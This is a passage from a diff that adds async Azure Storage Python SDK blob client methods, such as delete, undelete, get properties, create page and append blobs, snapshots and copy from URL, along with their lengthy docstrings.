not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword str encoding: + Encoding to decode the downloaded bytes. Default is None, i.e. no decoding. + :keyword progress_hook: + An async callback to track the progress of a long running download. The signature is + function(current: int, total: int) where current is the number of bytes transfered + so far, and total is the total size of the download. + :paramtype progress_hook: Callable[[int, int], Awaitable[None]] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :returns: A streaming object (StorageStreamDownloader) + :rtype: ~azure.storage.blob.aio.StorageStreamDownloader + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world_async.py + :start-after: [START download_a_blob] + :end-before: [END download_a_blob] + :language: python + :dedent: 16 + :caption: Download a blob. + """ + options = self._download_blob_options( + offset=offset, + length=length, + **kwargs) + downloader = StorageStreamDownloader(**options) + await downloader._setup() # pylint: disable=protected-access + return downloader + + @distributed_trace_async + async def delete_blob(self, delete_snapshots=None, **kwargs): + # type: (str, Any) -> None + """Marks the specified blob for deletion. + + The blob is later deleted during garbage collection. + Note that in order to delete a blob, you must delete all of its + snapshots. You can delete both at the same time with the delete_blob() + operation. + + If a delete retention policy is enabled for the service, then this operation soft deletes the blob + and retains the blob for a specified number of days. + After the specified number of days, the blob's data is removed from the service during garbage collection. + Soft deleted blob is accessible through :func:`~ContainerClient.list_blobs()` specifying `include=['deleted']` + option. Soft-deleted blob can be restored using :func:`undelete` operation. + + :param str delete_snapshots: + Required if the blob has associated snapshots. Values include: + - "only": Deletes only the blobs snapshots. + - "include": Deletes the blob along with all snapshots. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to delete. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword lease: + Required if the blob has an active lease. If specified, delete_blob only + succeeds if the blob's lease is active and matches this ID. Value can be a + BlobLeaseClient object or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world_async.py + :start-after: [START delete_blob] + :end-before: [END delete_blob] + :language: python + :dedent: 16 + :caption: Delete a blob. + """ + options = self._delete_blob_options(delete_snapshots=delete_snapshots, **kwargs) + try: + await self._client.blob.delete(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def undelete_blob(self, **kwargs): + # type: (Any) -> None + """Restores soft-deleted blobs or snapshots. + + Operation will only be successful if used within the specified number of days + set in the delete retention policy. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START undelete_blob] + :end-before: [END undelete_blob] + :language: python + :dedent: 12 + :caption: Undeleting a blob. + """ + try: + await self._client.blob.undelete(timeout=kwargs.pop('timeout', None), **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def exists(self, **kwargs): + # type: (**Any) -> bool + """ + Returns True if a blob exists with the defined parameters, and returns + False otherwise. + + :kwarg str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to check if it exists. + :kwarg int timeout: + The timeout parameter is expressed in seconds. + :returns: boolean + """ + try: + await self._client.blob.get_properties( + snapshot=self.snapshot, + **kwargs) + return True + # Encrypted with CPK + except ResourceExistsError: + return True + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceNotFoundError: + return False + + @distributed_trace_async + async def get_blob_properties(self, **kwargs): + # type: (Any) -> BlobProperties + """Returns all user-defined metadata, standard HTTP properties, and + system properties for the blob. It does not return the content of the blob. + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to get properties. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: BlobProperties + :rtype: ~azure.storage.blob.BlobProperties + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START get_blob_properties] + :end-before: [END get_blob_properties] + :language: python + :dedent: 12 + :caption: Getting the properties for a blob. + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + try: + cls_method = kwargs.pop('cls', None) + if cls_method: + kwargs['cls'] = partial(deserialize_pipeline_response_into_cls, cls_method) + blob_props = await self._client.blob.get_properties( + timeout=kwargs.pop('timeout', None), + version_id=kwargs.pop('version_id', None), + snapshot=self.snapshot, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=kwargs.pop('cls', None) or deserialize_blob_properties, + cpk_info=cpk_info, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + blob_props.name = self.blob_name + if isinstance(blob_props, BlobProperties): + blob_props.container = self.container_name + blob_props.snapshot = self.snapshot + return blob_props # type: ignore + + @distributed_trace_async + async def set_http_headers(self, content_settings=None, **kwargs): + # type: (Optional[ContentSettings], Any) -> None + """Sets system properties on the blob. + + If one property is set for the content_settings, all properties will be overridden. + + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: Dict[str, Any] + """ + options = self._set_http_headers_options(content_settings=content_settings, **kwargs) + try: + return await self._client.blob.set_http_headers(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def set_blob_metadata(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], Any) -> Dict[str, Union[str, datetime]] + """Sets user-defined metadata for the blob as one or more name-value pairs. + + :param metadata: + Dict containing name and value pairs. Each call to this operation + replaces all existing metadata attached to the blob. To remove all + metadata from the blob, call this operation with no metadata headers. + :type metadata: dict(str, str) + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified) + """ + options = self._set_blob_metadata_options(metadata=metadata, **kwargs) + try: + return await self._client.blob.set_metadata(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def set_immutability_policy(self, immutability_policy, **kwargs): + # type: (ImmutabilityPolicy, **Any) -> Dict[str, str] + """The Set Immutability Policy operation sets the immutability policy on the blob. + + .. versionadded:: 12.10.0 + This operation was introduced in API version '2020-10-02'. + + :param ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Key value pairs of blob tags. + :rtype: Dict[str, str] + """ + + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + return await self._client.blob.set_immutability_policy(cls=return_response_headers, **kwargs) + + @distributed_trace_async() + async def delete_immutability_policy(self, **kwargs): + # type: (**Any) -> None + """The Delete Immutability Policy operation deletes the immutability policy on the blob. + + .. versionadded:: 12.10.0 + This operation was introduced in API version '2020-10-02'. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Key value pairs of blob tags. + :rtype: Dict[str, str] + """ + + await self._client.blob.delete_immutability_policy(**kwargs) + + @distributed_trace_async + async def set_legal_hold(self, legal_hold, **kwargs): + # type: (bool, **Any) -> Dict[str, Union[str, datetime, bool]] + """The Set Legal Hold operation sets a legal hold on the blob. + + .. versionadded:: 12.10.0 + This operation was introduced in API version '2020-10-02'. + + :param bool legal_hold: + Specified if a legal hold should be set on the blob. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Key value pairs of blob tags. + :rtype: Dict[str, Union[str, datetime, bool]] + """ + + return await self._client.blob.set_legal_hold(legal_hold, cls=return_response_headers, **kwargs) + + @distributed_trace_async + async def create_page_blob( # type: ignore + self, size, # type: int + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + premium_page_blob_tier=None, # type: Optional[Union[str, PremiumPageBlobTier]] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """Creates a new Page Blob of the specified size. + + :param int size: + This specifies the maximum size for the page blob, up to 1 TB. + The page blob size must be aligned to a 512-byte boundary. + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :param ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword int sequence_number: + Only for Page blobs. The sequence number is a user-controlled value that you can use to + track requests. The value of the sequence number must be between 0 + and 2^63 - 1.The default value is 0. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict[str, Any] + """ + options = self._create_page_blob_options( + size, + content_settings=content_settings, + metadata=metadata, + premium_page_blob_tier=premium_page_blob_tier, + **kwargs) + try: + return await self._client.page_blob.create(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def create_append_blob(self, content_settings=None, metadata=None, **kwargs): + # type: (Optional[ContentSettings], Optional[Dict[str, str]], Any) -> Dict[str, Union[str, datetime]] + """Creates a new Append Blob. + + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict[str, Any] + """ + options = self._create_append_blob_options( + content_settings=content_settings, + metadata=metadata, + **kwargs) + try: + return await self._client.append_blob.create(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def create_snapshot(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], Any) -> Dict[str, Union[str, datetime]] + """Creates a snapshot of the blob. + + A snapshot is a read-only version of a blob that's taken at a point in time. + It can be read, copied, or deleted, but not modified. Snapshots provide a way + to back up a blob as it appears at a moment in time. + + A snapshot of a blob has the same name as the base blob from which the snapshot + is taken, with a DateTime value appended to indicate the time at which the + snapshot was taken. + + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Snapshot ID, Etag, and last modified). + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START create_blob_snapshot] + :end-before: [END create_blob_snapshot] + :language: python + :dedent: 12 + :caption: Create a snapshot of the blob. + """ + options = self._create_snapshot_options(metadata=metadata, **kwargs) + try: + return await self._client.blob.create_snapshot(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def start_copy_from_url(self, source_url, metadata=None, incremental_copy=False, **kwargs): + # type: (str, Optional[Dict[str, str]], bool, Any) -> Dict[str, Union[str, datetime]] + """Copies a blob from the given URL. + + This operation returns a dictionary containing `copy_status` and `copy_id`, + which can be used to check the status of or abort the copy operation. + `copy_status` will be 'success' if the copy completed synchronously or + 'pending' if the copy has been started asynchronously. For asynchronous copies, + the status can be checked by polling the :func:`get_blob_properties` method and + checking the copy status. Set `requires_sync` to True to force the copy to be synchronous. + The Blob service copies blobs on a best-effort basis. + + The source blob for a copy operation may be a block blob, an append blob, + or a page blob. If the destination blob already exists, it must be of the + same blob type as the source blob. Any existing destination blob will be + overwritten. The destination blob cannot be modified while a copy operation + is in progress. + + When copying from a page blob, the Blob service creates a destination page + blob of the source blob's length, initially containing all zeroes. Then + the source page ranges are enumerated, and non-empty ranges are copied. + + For a block blob or an append blob, the Blob service creates a committed + blob of zero length before returning from this operation. When copying + from a block blob, all committed blocks and their block IDs are copied. + Uncommitted blocks are not copied. At the end of the copy operation, the + destination blob will have the same committed block count as the source. + + When copying from an append blob, all committed blocks are copied. At the + end of the copy operation, the destination blob will have the same committed + block count as the source. + + :param str source_url: + A URL of up to 2 KB in length that specifies a file or blob. + The value should be URL-encoded as it would appear in a request URI. + If the source is in another account, the source must either be public + or must be authenticated via a shared access signature. If the source + is public, no authentication is required. + Examples: + https://myaccount.blob.core.windows.net/mycontainer/myblob + + https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot= + + https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken + :param metadata: + Name-value pairs associated with the blob as metadata. If no name-value + pairs are specified, the operation will copy the metadata from the + source blob or file to the destination blob. If one or more name-value + pairs are specified, the destination blob is created with the specified + metadata, and metadata is not copied from the source blob or file. + :type metadata: dict(str, str) + :param bool incremental_copy: + Copies the snapshot of the source page blob to a destination page blob. + The snapshot is copied such that only the differential changes between + the previously copied snapshot are transferred to the destination. + The copied snapshots are complete copies of the original snapshot and + can be read or copied from as usual. Defaults to False. + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_). + + The (case-sensitive) literal "COPY" can instead be passed to copy tags from the source blob. + This option is only available when `incremental_copy=False` and `requires_sync=True`. + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) or Literal["COPY"] + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only if the source + blob has been modified since the specified date/time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only if the source blob + has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only + if the destination blob has been modified since the specified date/time. + If the destination blob has not been modified, the Blob service returns + status code 412 (Precondition Failed). + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only + if the destination blob has not been modified since the specified + date/time. If the destination blob has been modified, the Blob service + returns status code 412 (Precondition Failed). + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword destination_lease: + The lease ID specified for this header must match the lease ID of the + destination blob. If the request does not include the lease ID or it is not + valid, the operation fails with status code 412 (Precondition Failed). + :paramtype destination_lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword source_lease: + Specify this to perform the Copy Blob operation only if + the lease ID given matches the active lease ID of the source blob. + :paramtype source_lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :keyword bool seal_destination_blob: + Seal the destination append blob. This operation is only for append blob. + + .. versionadded:: 12.4.0 + + :keyword bool requires_sync: + Enforces that the service will not return a response until the copy is complete. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. This option is only available when `incremental_copy` is + set to False and `requires_sync` is set to True. + + .. versionadded:: 12.9.0 + + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the sync copied blob. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.10.0 + + :returns: A dictionary of copy properties (etag, last_modified, copy_id, copy_status). + :rtype: dict[str, Union[str, ~datetime.datetime]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START copy_blob_from_url] + :end-before: [END copy_blob_from_url] + :language: python + :dedent: 16 + :caption: Copy a blob from a URL. + """ + options = self._start_copy_from_url_options( + source_url=self._encode_source_url(source_url), + metadata=metadata, + incremental_copy=incremental_copy, + **kwargs) + try: + if incremental_copy: + return await self._client.page_blob.copy_incremental(**options) + return await self._client.blob.start_copy_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def abort_copy(self, copy_id, **kwargs): + # type: (Union[str, Dict[str, Any], BlobProperties], Any) -> None + """Abort an ongoing copy operation. + + This will leave a destination blob with zero length and full metadata. + This will raise an error if the copy operation has already ended. + + :param copy_id: + The copy operation to abort. This can be either an ID, or an + instance of BlobProperties. + :type copy_id: str or ~azure.storage.blob.BlobProperties + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START abort_copy_blob_from_url] + :end-before: [END abort_copy_blob_from_url] + :language: python + :dedent: 16 + :caption: Abort copying a blob from URL. + """ + options = self._abort_copy_options(copy_id, **kwargs) + try: + await self._client.blob.abort_copy_from_url(**options) + except 